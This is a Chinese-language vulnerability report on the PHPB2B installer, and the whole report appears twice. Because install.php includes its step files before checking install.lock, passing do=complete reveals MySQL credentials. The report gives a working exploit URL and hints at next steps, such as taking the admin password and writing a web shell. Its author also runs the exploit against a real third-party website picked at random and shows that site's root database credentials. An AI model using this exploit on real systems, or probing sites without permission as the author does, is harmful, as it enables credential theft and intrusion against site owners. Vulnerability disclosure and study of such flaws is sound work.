### 简要描述: PHPB2B某处漏洞直接查看mysql密码 ### 详细说明: PHPB2B某处漏洞直接查看mysql密码 官网下载的最新版 install/install.php 安装文件,查看下代码。 ``` <?php /** * [PHPB2B] Copyright (C) 2007-2099, Ualink Inc. All Rights Reserved. * The contents of this file are subject to the License; you may not use this file except in compliance with the License. * * @version $Revision: 2048 $ */ /* Installer bootstrap: defines constants, pulls in the config and core libraries, picks the UI language, builds the install URL and finally dispatches to step<N>.inc.php. NOTE(review): the install.lock guard is the last statement of this file, after the do=complete dispatch, so on an already-installed site the lock does not stop the step files from being included. */ session_start(); error_reporting(E_ERROR | E_NOTICE); /* NOTE(review): legacy magic_quotes handling; set_magic_quotes_runtime() and get_magic_quotes_gpc() no longer exist on current PHP releases, so this file only runs on old interpreters. */ set_magic_quotes_runtime(0); ini_set('magic_quotes_sybase', 0); ini_set('max_execution_time', '300'); /* NOTE(review): phpinfo() is served to any unauthenticated caller and before the install.lock check below; it discloses environment and configuration details and should be removed or at least gated behind the lock. */ if (isset($_GET['act'])) { if($_GET['act'] == "phpinfo"){ die(phpinfo()); } } if (!defined('DIRECTORY_SEPARATOR')) { define('DIRECTORY_SEPARATOR','/'); } define('DS', DIRECTORY_SEPARATOR); define('TIME', time()); define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc()); /* PHPB2B_ROOT strips the trailing 7-character "install" directory name from this file's directory. */ define('PHPB2B_ROOT', substr(dirname(__FILE__), 0, -7)); define('MIN_PHP_VERSION', '5.0.0'); //define('JSMIN_AS_LIB', true); // prevents auto-run on include require '../phpb2b_version.php'; require '../configs/config.inc.php'; require '../libraries/core/paths.php'; if (version_compare(PHP_VERSION, MIN_PHP_VERSION, '<')) { echo 'PHPB2B '. PHPB2B_VERSION. ' require php'. MIN_PHP_VERSION.', but your php version is ' . PHP_VERSION . ".\n"; exit; } define('IN_PHPB2B',true); if(!defined('LIB_PATH')) define('LIB_PATH',PHPB2B_ROOT.'libraries'.DS); require '../libraries/global.func.php'; require '../libraries/func.sql.php'; require "../libraries/db_mysql.inc.php"; require "../libraries/core/object.php"; require "../libraries/core/controller.php"; require "../libraries/file.class.php"; require "../libraries/template.class.php"; require "../libraries/source/error.class.php"; /* Language defaults to the first Accept-Language value, but only when a matching languages/<lang>/global.csv exists. */ list($accept_language) = explode(",", $_SERVER['HTTP_ACCEPT_LANGUAGE']); if(file_exists(PHPB2B_ROOT. 'languages'.DS.strtolower($accept_language).DS."global.csv")) { $app_lang = strtolower($accept_language); } if (!is_writable(PHPB2B_ROOT."data".DS)) { echo PHPB2B_ROOT."data".DS. 
" is not writeable.\n"; exit; } /* NOTE(review): $app_lang is taken verbatim from the query string and is spliced into filesystem paths (pb_configmake() and the CACHE_* defines just below); restrict it to the language names actually present under languages/ before use — TODO confirm whether pb_configmake() validates it. */ if (!empty($_GET['app_lang'])) { $app_lang = $_GET['app_lang']; } if (!is_file(PHPB2B_ROOT."data".DS."language".DS.$app_lang.DS."default.conf")) { pb_configmake($app_lang); } if (!defined('CACHE_PATH')) { define('CACHE_PATH', PHPB2B_ROOT."data".DS."cache".DS.$app_lang.DS); define('CACHE_LANG_PATH', PHPB2B_ROOT."data".DS."cache".DS.$app_lang.DS); define('CACHE_COMMON_PATH', PHPB2B_ROOT."data".DS."cache".DS); } //language $smarty = new TemplateEngines(); $sections = array('install', 'javascript'); //da($smarty); $smarty->configLoad('default.conf', $sections); $arrTemplate = $smarty->getConfigVars(); extract($arrTemplate); //:~ $db = new DB_Sql(); $file_cls = new Files(); $pb_protocol = 'http'; if ( isset( $_SERVER['HTTPS'] ) && ( strtolower( $_SERVER['HTTPS'] ) != 'off' ) ) { $pb_protocol = 'https'; } $PHP_SELF = isset($_SERVER['SCRIPT_NAME']) ? $_SERVER['SCRIPT_NAME'] : preg_replace("/(.*)\.php(.*)/i", "\\1.php", $_SERVER['PHP_SELF']); $BASESCRIPT = basename($PHP_SELF); list($BASEFILENAME) = explode('.', $BASESCRIPT); $install_url = htmlspecialchars($pb_protocol."://".pb_getenv('HTTP_HOST').preg_replace("/\/+(api|wap)?\/*$/i", '', substr($PHP_SELF, 0, strrpos($PHP_SELF, '/'))).'/'); $siteUrl = substr($install_url,0,-(strlen($BASEFILENAME)+1)); $time_stamp = TIME; /* NOTE(review): extract($_REQUEST, EXTR_SKIP) turns every request parameter into a global variable; EXTR_SKIP only protects names that already exist at this point. Prefer reading the few expected keys from $_GET/$_POST explicitly. */ if($_REQUEST) { if(!MAGIC_QUOTES_GPC) { $_REQUEST = pb_addslashes($_REQUEST); if($_COOKIE) $_COOKIE = pb_addslashes($_COOKIE); } extract($_REQUEST, EXTR_SKIP); } if(!isset($_GET['step'])) { $step = '1'; }else{ $step = intval($_GET['step']); } /* NOTE(review): ordering defect — this include of step<N>.inc.php runs before the install.lock test below, so on an already-installed site do=complete still executes the step file (per the report, step 5 prints the database credentials). intval() confines the include to files named step<digits>.inc.php but is no substitute for the lock; move the file_exists(PHPB2B_ROOT.'data/install.lock') guard above this dispatch, or re-check the lock inside every step file. */ if (isset($_GET['do'])) { $do = trim($_GET['do']); if($do == "complete"){ include "step".$step.".inc.php"; exit; } } /* NOTE(review): this guard only protects what follows it; to be effective it has to come before the do=complete dispatch above. */ if(file_exists(PHPB2B_ROOT.'data/install.lock')) { $msg = L("install_locked", "tpl"); Errors::showError($msg); exit; } ``` 只要传入do=complete就可以包含step文件 但是权限检测却在 104-108行 ``` if(file_exists(PHPB2B_ROOT.'data/install.lock')) { $msg = L("install_locked", "tpl"); Errors::showError($msg); exit; } ``` 
这样的话,我们虽然不能重装,但是却可以拿到重要信息。比如mysql数据库账号密码!! 本机演示。 http://127.0.0.1/phpb2b/install/install.php?step=5&app_lang=zh-cn&do=complete [<img src="https://images.seebug.org/upload/201501/06165533f5893620ab28511b59ebfe9d440e80fe.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/06165533f5893620ab28511b59ebfe9d440e80fe.png) 因为默认不删除install.php文件,也就是只要安装了phpb2b,那么肯定可以查看msyql密码了,如果开启了远程连接,或者phpmyadmin,直接拿后台密码、写入shell,各种你懂的。 因为官方删除了install文件夹,不能演示。网上随便找了个网站。 http://en.csjci.com/install/install.php?step=5&app_lang=zh-cn&do=complete [<img src="https://images.seebug.org/upload/201501/06165606d24a4405120e316edfa2f8eda4567e9d.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/06165606d24a4405120e316edfa2f8eda4567e9d.png) 还是root呢~ ### 漏洞证明: PHPB2B某处漏洞直接查看mysql密码 官网下载的最新版 install/install.php 安装文件,查看下代码。 ``` <?php /** * [PHPB2B] Copyright (C) 2007-2099, Ualink Inc. All Rights Reserved. * The contents of this file are subject to the License; you may not use this file except in compliance with the License. * * @version $Revision: 2048 $ */ /* Installer bootstrap: defines constants, pulls in the config and core libraries, picks the UI language, builds the install URL and finally dispatches to step<N>.inc.php. NOTE(review): the install.lock guard is the last statement of this file, after the do=complete dispatch, so on an already-installed site the lock does not stop the step files from being included. */ session_start(); error_reporting(E_ERROR | E_NOTICE); /* NOTE(review): legacy magic_quotes handling; set_magic_quotes_runtime() and get_magic_quotes_gpc() no longer exist on current PHP releases, so this file only runs on old interpreters. */ set_magic_quotes_runtime(0); ini_set('magic_quotes_sybase', 0); ini_set('max_execution_time', '300'); /* NOTE(review): phpinfo() is served to any unauthenticated caller and before the install.lock check below; it discloses environment and configuration details and should be removed or at least gated behind the lock. */ if (isset($_GET['act'])) { if($_GET['act'] == "phpinfo"){ die(phpinfo()); } } if (!defined('DIRECTORY_SEPARATOR')) { define('DIRECTORY_SEPARATOR','/'); } define('DS', DIRECTORY_SEPARATOR); define('TIME', time()); define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc()); /* PHPB2B_ROOT strips the trailing 7-character "install" directory name from this file's directory. */ define('PHPB2B_ROOT', substr(dirname(__FILE__), 0, -7)); define('MIN_PHP_VERSION', '5.0.0'); //define('JSMIN_AS_LIB', true); // prevents auto-run on include require '../phpb2b_version.php'; require '../configs/config.inc.php'; require '../libraries/core/paths.php'; if (version_compare(PHP_VERSION, MIN_PHP_VERSION, '<')) { echo 'PHPB2B '. PHPB2B_VERSION. ' require php'. MIN_PHP_VERSION.', but your php version is ' . PHP_VERSION . 
".\n"; exit; } define('IN_PHPB2B',true); if(!defined('LIB_PATH')) define('LIB_PATH',PHPB2B_ROOT.'libraries'.DS); require '../libraries/global.func.php'; require '../libraries/func.sql.php'; require "../libraries/db_mysql.inc.php"; require "../libraries/core/object.php"; require "../libraries/core/controller.php"; require "../libraries/file.class.php"; require "../libraries/template.class.php"; require "../libraries/source/error.class.php"; /* Language defaults to the first Accept-Language value, but only when a matching languages/<lang>/global.csv exists. */ list($accept_language) = explode(",", $_SERVER['HTTP_ACCEPT_LANGUAGE']); if(file_exists(PHPB2B_ROOT. 'languages'.DS.strtolower($accept_language).DS."global.csv")) { $app_lang = strtolower($accept_language); } if (!is_writable(PHPB2B_ROOT."data".DS)) { echo PHPB2B_ROOT."data".DS. " is not writeable.\n"; exit; } /* NOTE(review): $app_lang is taken verbatim from the query string and is spliced into filesystem paths (pb_configmake() and the CACHE_* defines just below); restrict it to the language names actually present under languages/ before use — TODO confirm whether pb_configmake() validates it. */ if (!empty($_GET['app_lang'])) { $app_lang = $_GET['app_lang']; } if (!is_file(PHPB2B_ROOT."data".DS."language".DS.$app_lang.DS."default.conf")) { pb_configmake($app_lang); } if (!defined('CACHE_PATH')) { define('CACHE_PATH', PHPB2B_ROOT."data".DS."cache".DS.$app_lang.DS); define('CACHE_LANG_PATH', PHPB2B_ROOT."data".DS."cache".DS.$app_lang.DS); define('CACHE_COMMON_PATH', PHPB2B_ROOT."data".DS."cache".DS); } //language $smarty = new TemplateEngines(); $sections = array('install', 'javascript'); //da($smarty); $smarty->configLoad('default.conf', $sections); $arrTemplate = $smarty->getConfigVars(); extract($arrTemplate); //:~ $db = new DB_Sql(); $file_cls = new Files(); $pb_protocol = 'http'; if ( isset( $_SERVER['HTTPS'] ) && ( strtolower( $_SERVER['HTTPS'] ) != 'off' ) ) { $pb_protocol = 'https'; } $PHP_SELF = isset($_SERVER['SCRIPT_NAME']) ? 
$_SERVER['SCRIPT_NAME'] : preg_replace("/(.*)\.php(.*)/i", "\\1.php", $_SERVER['PHP_SELF']); $BASESCRIPT = basename($PHP_SELF); list($BASEFILENAME) = explode('.', $BASESCRIPT); $install_url = htmlspecialchars($pb_protocol."://".pb_getenv('HTTP_HOST').preg_replace("/\/+(api|wap)?\/*$/i", '', substr($PHP_SELF, 0, strrpos($PHP_SELF, '/'))).'/'); $siteUrl = substr($install_url,0,-(strlen($BASEFILENAME)+1)); $time_stamp = TIME; /* NOTE(review): extract($_REQUEST, EXTR_SKIP) turns every request parameter into a global variable; EXTR_SKIP only protects names that already exist at this point. Prefer reading the few expected keys from $_GET/$_POST explicitly. */ if($_REQUEST) { if(!MAGIC_QUOTES_GPC) { $_REQUEST = pb_addslashes($_REQUEST); if($_COOKIE) $_COOKIE = pb_addslashes($_COOKIE); } extract($_REQUEST, EXTR_SKIP); } if(!isset($_GET['step'])) { $step = '1'; }else{ $step = intval($_GET['step']); } /* NOTE(review): ordering defect — this include of step<N>.inc.php runs before the install.lock test below, so on an already-installed site do=complete still executes the step file (per the report, step 5 prints the database credentials). intval() confines the include to files named step<digits>.inc.php but is no substitute for the lock; move the file_exists(PHPB2B_ROOT.'data/install.lock') guard above this dispatch, or re-check the lock inside every step file. */ if (isset($_GET['do'])) { $do = trim($_GET['do']); if($do == "complete"){ include "step".$step.".inc.php"; exit; } } /* NOTE(review): this guard only protects what follows it; to be effective it has to come before the do=complete dispatch above. */ if(file_exists(PHPB2B_ROOT.'data/install.lock')) { $msg = L("install_locked", "tpl"); Errors::showError($msg); exit; } ``` 只要传入do=complete就可以包含step文件 但是权限检测却在 104-108行 ``` if(file_exists(PHPB2B_ROOT.'data/install.lock')) { $msg = L("install_locked", "tpl"); Errors::showError($msg); exit; } ``` 这样的话,我们虽然不能重装,但是却可以拿到重要信息。比如mysql数据库账号密码!! 本机演示。 http://127.0.0.1/phpb2b/install/install.php?step=5&app_lang=zh-cn&do=complete [<img src="https://images.seebug.org/upload/201501/06165533f5893620ab28511b59ebfe9d440e80fe.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/06165533f5893620ab28511b59ebfe9d440e80fe.png) 因为默认不删除install.php文件,也就是只要安装了phpb2b,那么肯定可以查看msyql密码了,如果开启了远程连接,或者phpmyadmin,直接拿后台密码、写入shell,各种你懂的。 因为官方删除了install文件夹,不能演示。网上随便找了个网站。 http://en.csjci.com/install/install.php?step=5&app_lang=zh-cn&do=complete [<img src="https://images.seebug.org/upload/201501/06165606d24a4405120e316edfa2f8eda4567e9d.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/06165606d24a4405120e316edfa2f8eda4567e9d.png) 还是root呢~